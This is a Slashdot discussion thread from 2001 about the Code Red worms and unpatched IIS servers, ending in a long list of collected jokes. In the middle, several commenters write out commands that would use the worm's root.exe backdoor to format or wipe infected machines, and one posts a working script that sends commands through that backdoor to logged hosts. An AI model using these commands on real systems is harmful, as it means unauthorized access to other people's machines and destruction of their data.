Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Re:Bah.

[austad]

How about an apache box in front of the IIS server with mod_proxy installed and setup as a reverse proxy filtering out default.ida requests??

Re:It's not like they haven't announced the patch

[mblase]

not everyone is super connected and does know about this

"Ignorance of the law is no excuse", nor is ignorance of your upgrade cycle.

Its Microsoft's responisibilty to do everything they can to notify Win 2000 customers and solve this problem

As I said, they're already doing that. The problem is that too many people don't realize it's a problem they need to attend to. They think they can just install a server, run it, and forget about it.

their design flaw, not the admins. So they need to fix it.

What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.

I'm not "blaming consumers for the corporation's mistakes," as you say. I'm saying that the corporation is doing everything it can be reasonably expected to, short of directly violating the privacy of every one of its registered customers by forcing a software upgrade down their broadband throats. At some point, you have to lay the blame on the users.

eEye's Scanner

[slashkitty]

This would be a security scanner from eEye.

http://www.eEye.com/Retina

Why aren't these machines patched yet?

[tmark]

How is it that all this time after Code Red first hit the news, so many machine still remain unpatched ? Are the Koreans being disproportionately affected, or is it having major impact over here too ? And if the Koreans are being disproportionately affected, why ? Is press coverage of the virus less prevalent over there ? Could it be something as silly as Koreans not being as adept at the English language ?

And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good ? Maybe the Persians and Turks are being hit badly by Code Red as well ?

Re:Why aren't these machines patched yet?

[nether]

Because the patch does not fix the problem completely. Even if your server is patched, if you are redirecting URLs, the worm will be able to infect your machine. http://archives.neohapsis.com/archives/incidents/2 001-08/0218.html

Re:Perhaps we should reconsider...

[norton_I]

The funny thing is, if you ISP terminates web services to all of their clients because (say) 10% of them are infected, they come out of it clean, and can hide behind a service agreement.

If I disable someone's web server because they are actively trying to infect my computer with a virus , I am liable for any damages, even ones they make up.

Despite the fact that almost nobody reads, and fewer understand their ISP service agreements, if I put up a "service agreement" on my web server that says "by accessing this web server you agree that you are not infected by the code red virus. If I determine that you are, you agree that I may take any necessary actions to protect my services, including but not limited to automated installation of anti-virus software..." It doesn't count, since I can't have any expectation that someone infected by code red would ever see the agreement.

Re:More information?

[unitron]

Actually deltree /y c: "accidentally hit the enter key instead of the \ which was to be followed by the single directory you wanted to delete" works quite well at wiping the entire C drive. It proceeds to do so undisturbed by any keystroke combinations intended to stop it.

not in critical systems.

[rebelcool]

Just because their laptops have win2000 installed doesnt mean the life support is running from windows. It's not.

Re:not in critical systems.

[Syberghost]

You don't have to have it in CRITICAL systems to result in loss of life; if it's feeding you faulty data and you're making decisions based on that data, you could run out of oxygen 8 hours earlier than you thought, or something similar.

And as for the Navy, they're launching missiles with the damn thing.

Versions of the worm...

[Moonshadow]

Code Red: A New Worm
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace

And finally...

Code Red: Attack of the Clones

Re:Bah.

[AJWM]

I run a server with three virtual domains, separate logs for each. The IP numbers are sequential, but I see 1092 hits (of the XXXXX variant) on one, 584 on the second and 579 on the third.

Whoops, make that 1094 on the first and 580 on the third -- got a couple more as I was entering this.

Re:Microsoft feature?

[mpe]

If you do a default installation of Win2k Pro it does not install the World Wide Web Publishing Service.(at least in my experience) The win2k Server will install it by default

I wonder what IIS is considered a dependency for under W2K. Also if Office 2K can install it...

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Why people love Code Red

[SomeoneYouDontKnow]

It's impossible to guard 100% against any kind of break-in. Anyone who thinks they have all the angles covered in deluding themselves. And even if you manage to get a system completely locked down, every new piece of software you install presnets new opportunities for exploits.

Yes, everyone should have backups, but that doesn't make it OK to destroy data. You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different? Suppose someone was able to hack a computer at your local power company and black out half the state? Backups won't help you there. Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless. I've been there before, and it ain't no fun. Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.

You may not want your tax dollars going to fight that. OK, fine, then make the responsible party pay restitution to cover the costs of the investigation. If he's a minor, make his parents pay. If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.

Re:Why people love Code Red

[SomeoneYouDontKnow]

Yes, the people who run poorly-patched servers bear some of the blame, but most of the blame still falls on the shoulders of the worm writer. Even if you don't lock the doors to your house, someone who walks in and steals your TV is still guilty of burglary. In the case of Code Red and its successors, the owners of the systems are becoming more and more to blame as time goes by and they don't patch, but does that excuse the worm writer? Not in the least.

As for the 15-year-olds, I never said parents don't have responsibility. I think they do, and I also think a good many of them park their kids in front of a TV or computer, and that's wrong. But I was 15 once, and although that was before the age of the mass-marketed Internet, I knew the difference between right and wrong, and these kids do, too. If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him? Tell him he's been a very bad boy, and say he should never do that again? That might work for the first time and for an extremely minor infraction, but there has to be the threat of some real punishment, or the problem will never end.

Or perhaps we should just lock the 1337 hax0r in a room with the admin of the system he trashed and let it get settled that way. In fairness to a civil society and the health of the kid, the criminal justice system would probably be a better alternative, no?

Re:Viruses

[Moonshadow]

Yeah, but "viruses" doesn't rhyme with "jedi".

It's called a sense of humor. Try one out some time. Geez, somebody needs a laxative...

Re:It's not like they haven't announced the patch

[zhensel]

A couple things-
-Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" varient, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
-The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.

Re:Finally

[insane.idoru]

I think we all know that someone is going to make the horrid desicion of calling it "attack of the Code Red"...

CR written by a linux zealot?

[TMB]

It occurs to me...

Let's say you read /.. And let's say you're a Linux zealot. but I repeat myself. ;-)

I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.

Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.

This looks suspiciously like what an unscrupulous /. Linux zealot might wish for in their wildest dreams. I don't necessarily think the original CR was written by one, but I wouldn't be surprised if the more virulant strains were/are/will be.

If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.

[TMB]

Legal the same way as ShareSniffer, perhaps?

[Myself]

Read this if you're not familiar with ShareSniffer

Essentially, they say that since people enable drive sharing manually, an open share holds the same legality as a clickthrough license: You wouldn't have clicked it if you didn't want to do that, so you're responsible for what happens.

People don't install Windows by mistake. (well, that's another joke entirely) If they have services running that any reasonably competent admin would know about, they're responsible for those.

The point of a server is to let people use it. The point of an internet connection is to make your computer part of a global network. If you're running a server on the internet, you INTEND to have it accessed by anyone who wants to.

The worm's problem is that it's malicious, sucking up unreasonable amounts of bandwidth and denying service to others. If someone wrote a fixit worm that worked as advertised, I don't see how it could run afoul of the law. Just be careful with the bandwidth usage. Someone might call it unauthorized access, which is bullshit, access is implicitly authorized by the machine's very presence on the internet.

IANAL!

Use this tool, you can install Service Pack MAXINT

[leonbrooks]

The magic word is ASP2PHP. Apply this to the offending projects, kiss IIS and Windows goodbye forever. Ahhhhh! Feels so good! Won't run down your battery! Made entirely from all-Open ingredients!

Encourage the author (Naken) and you'll soon be able to bin VB screen apps as well. Woohoo!

Re:Pirate copies

[CharlieG]

The big problem with sending out the patch to "Registered" users is this - I'll give high odds that MOST copies of NT/Win2K running at home are pirate copies. Ditto the copies running in China - Between the 2, you are talking about the majority of the still infected boxes out there

Re:Shutting off IIS on an comprimised box...

[frankie]

Most of the infections I've seen are on home PCs with cable modem, and the owner doesn't even know that IIS is active by default. I'd like to find a request that will switch IIS service from automatic to disabled. They'll never notice the difference, and the world will be a better place.

Dynamic Updates

[Tom7]

Hehe.

I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)

I want Code Red IV myself...

[QwkHyenA]

Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

Re:I want Code Red IV myself...

[b1t+r0t]

I'd be happy if it used an HCF instruction, or at least programmed the video chip for an extremely high resolution at 100 Hz refresh, resulting in the monitor going HCF. Another option (on soft-power ATX machines) is to shut down (but not reboot) the system. Maybe zero out the boot blocks, too. Actually just the boot blocks alone would be enough fun. Basically, something annoying that has at least a 1% chance of getting the attention of your average MCSE.

Re:I want Code Red IV myself...

[JBowz15]

I can't wait for Code Red IV...

I really liked the first three, and I hear that in part IV, Code Red fights the big Soviet after Apollo gets killed by him.

To bad Code Red part V, will inevitably suck.

More information?

[Dr.+Evil]

I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.

Re:More information?

[ncc74656]

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
+h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done

Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

Re:More information?

[macdaddy]

It's not offtopic if I'm answering someone's question. Damn trolls with moderator points to burn.

Re:More information?

[MouseR]

From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II

What the hell is a bigger backdoor?

One's socket after being rampaged with a big stick?

Gee, do I find reporters entertaining when they talk about things they don't know (which is about everything except reporting).

Re:More information?

[snake_dad]

Don't forget the "echo Y" pipe trick :-)
I don't know if that still works under NT though, fortunately no NT machine available to test it...

Re:More information?

[helleman]

Modified version to grep standard apache log Change the top to be the following: file:#!/bin/sh for i in `(grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq )` do=

Re:More information?

[blakestah]

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.


What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
Still has the XXX and installs the backdoor

Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

We can do it for them...

GET /script/root.exe?+%2fc+format+c:

Re:More information?

[Drone-X]

Don't forget the "echo Y" pipe trick :-)

I very much doubt piping or redirecting is going to work, the system (or its equivalent) call probably won't except that.

What you could do is issue a "deltree /y c:\*.*". However, I had no luck with doing a "dir c:\*.*" previously so perhaps only a "deltree /y ..\..\*.*" works via root.exe.

Re:More information?

[pi_rules]

There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.

Justin Buist

Re:More information?

[ncc74656]

maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red

I threw IIS onto my Win2K box (it sits behind a Linux firewall and only does workstation stuff) to play with different usernames. I considered sending to Administrator, but if nobody is logged in as an admin, nobody will see the message. Also, some shops change "Administrator" to something else, in which case sending to that name will fail altogether. (I'll allow that someone with the minimal clue needed to rename the admin account probably knows well enough to keep up on patches and updates, so this might not be a common occurrence.) Your suggestion to send to /domain only works if domain-based security is in use (presumably either the domain security in NT 4 or ActiveDirectory in Win2K). Most of the shops that are having problems with CodeRed probably don't know how to set up and manage domains.

Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.

I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.

Re:More information?

[Phroggy]

Code Red II doesn't give you Administrator access; root.exe usually runs with the privaleges of the Internet Guest Account.

Re:More information?

[unitron]

For which command is /autotest an undocumented switch?

Re:More information?

[ichimunki]

If we have full access via web browser to the system, can't we simply send a GET with a URL ending in a goddam "poweroff" command or at least "kill -9 IIS" or "rm -rf /IIS/"? (Note that I include only Unix commands because I have no idea what these commands would be on NT)

Re:More information?

[ryanr]

The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

In any case, if someone is able to translate
this link
That would be a huge help.

Re:More information?

[asackett]

However, I had no luck with doing a "dir c:\*.*" previously so...

You may get 403'd several times, as the infected machines reach their limits after a while. Just keep poking at it, you'll get your directory listing. What you won't get, though, is privilege enough to shut down either IIS or the OS itself, format the drives, reboot the box, etc.

Some folks have taken to leaving graffiti in infected machines as they find them. It's awfully tempting...

Re:More information?

[snake_dad]

Purely hypothetical, this might work:

"echo y|format c:"

Theoretically this would bypass the "are you really, really, absolutely 100% sure that you want to format this drive which may cause some dataloss?" question... Ofcourse, theoretically, this only works in "english" versions of format.[com|exe|whatever].

I, hypothetically, could have used this to scare the living shit out of some friends, by typing it on the command prompt and then hovering over the enter key, grinning mischievously. I never did, ofcourse.

Maybe the format command needs a "/u" parameter, but researching this is left as an educational exercise for the reader :-)

PS: one word: .... backup! :)

Re:More information?

[Cheeko]

Actually I velieve that Code Red III is the varient that CNN reported is showing up in Southeast Asia (Korea I believe). From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II. Then again until it starts to hit someplace in the US or Europe I don't think it will be really confirmed.

Re:More information?

[cabbey]

maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red, see www.cert.org/advisories/CA-2001-23.html for details" would be more effective, especially if the server admin's bos sees it.

and while you're at it, stop the infection from spreading: 'net stop "Internet Information Server"' ;)

Re:More information?

[BigBlockMopar]

I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

Very, very, very cool. Thank you for sharing it. I'm going to hack it to tail a standard Apache log file and alert the luser directly.

Re:More information?

[BigBlockMopar]

We can do it for them...
GET /script/root.exe?+%2fc+format+c:

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

Re:More information?

[cabbey]

oh yeah... I forgot about the requirements on having domain auth setup... it's already been there on every windows box I've every used.

Your numbers look a little better than mine, odd given that mine were all connected back within a few seconds of connecting to me.

Marketing

[csbruce]

Code Red III which is apparently faster and more vicious than its entertaining predecessors.

I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!

Re:Microsoft should be sued

[tcc]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.

Why should microsoft get sued for having stupid users?

It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...

I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?

See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.

BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well) Tech people always have to pay because of non-tech people, it always been like that... just like we have to pay high insurance rates because people have abused it and gave ammos to the insurance companies to f* us.

I'm so fucking tired of this virus.... where's the big reset switch of the internet? :)

Re:Microsoft should be sued

[mpe]

Suppose you're a regular home user. You go to the store and buy a PC with windows preinstalled. Since you get the OEM version of Windows you don't get a nice windows box, you don't even get a decent manual, all you get is a license and, if you're lucky, a CD.

Dosn't really matter how you buy Windows, you arn't going to get even a half decent manual....

Perhaps we should reconsider...

[Rob+Mac+K]

I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

Thoughts?

Re:Perhaps we should reconsider...

[tringstad]

I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response

I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:

2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -

At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:

Name: authorized-scan1.security.home.net
Address: 24.0.0.203

Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...

I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.

(And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)

-Tommy

Re:Perhaps we should reconsider...

[norton_I]

I have been seriously considering the "counterattach" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

Re:Perhaps we should reconsider...

[norton_I]

Yeah, but the webserver would be off. There is not vulnerability until it is turned back on. The goal is, if someone actually uses their webserver, they will notice it is off, and when they turn it on, the first thing they will see is "you need to install this patch". If they don't use it, they will never notice it is off, and they will be immune to all further IIS worms.

Re:Not SYSTEM-level access....

[baptiste]

But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists.

Re:An ETHICAL way to Anti-Virus

[nitehorse]

Actually, if you add a line in your httpd.conf that looks like this:

AddHandler cgi-script .ida

then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

AddType application/x-httpd-php .php .php3 .ida

Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

-Chris

Re:More info on Code Red III

At least give some credit!! That was origionally a spoof of the goodtimes hoax.

Slashdot Humor

[Futurepower(tm)]

-

I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:

Lotteries are a tax on people who suck at math.

"He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1

The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!

Someone had to put all that chaos there! by Greyfox (nride@uswest.net)

I love vegetarians - some of my favorite foods are vegetarians.

"Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin

The truth does not set you free, it just makes everyone irritable.

Which is worse: Ignorance or Apathy? Who knows? Who cares?

It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...

From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]

"You can't have everything. Where would you keep it?" -- Steven Wright

A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)

"Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman

This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)

It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)

Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)

When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)

"Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.

Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)

The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin

5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)

"Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)

If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT

-- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT

The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)

There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT

The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT

Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT

If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)

Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT

Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)

"One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT

"'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT

The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT

-o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT

There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT

All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT

A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT

Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright

I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT

Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT

"Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT

I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT

The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein

There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT#106)

"Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller

Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT#19)

Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT#124) (User #41507 Info)http://www.sirinek.com

"I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000

by NecroPuppy on Tuesday August 22, @10:51PM EDT#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.

Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT#23)

You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT#74) (User #167606 Info)

"Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT#124) (User #106484 Info)

5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT#116) (User #169716 Info)http://www.iceball.net

Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT#46) (User #10021 Info)

Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT#53) (User #156224 Info)

The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson

Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT#221) (User #126570 Info)"

If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT#54) (User #150110 Info)

I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT#23) (User #37846 Info)http://www.qsl.net/~kc5aot

Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST#60) (User #37395 Info)

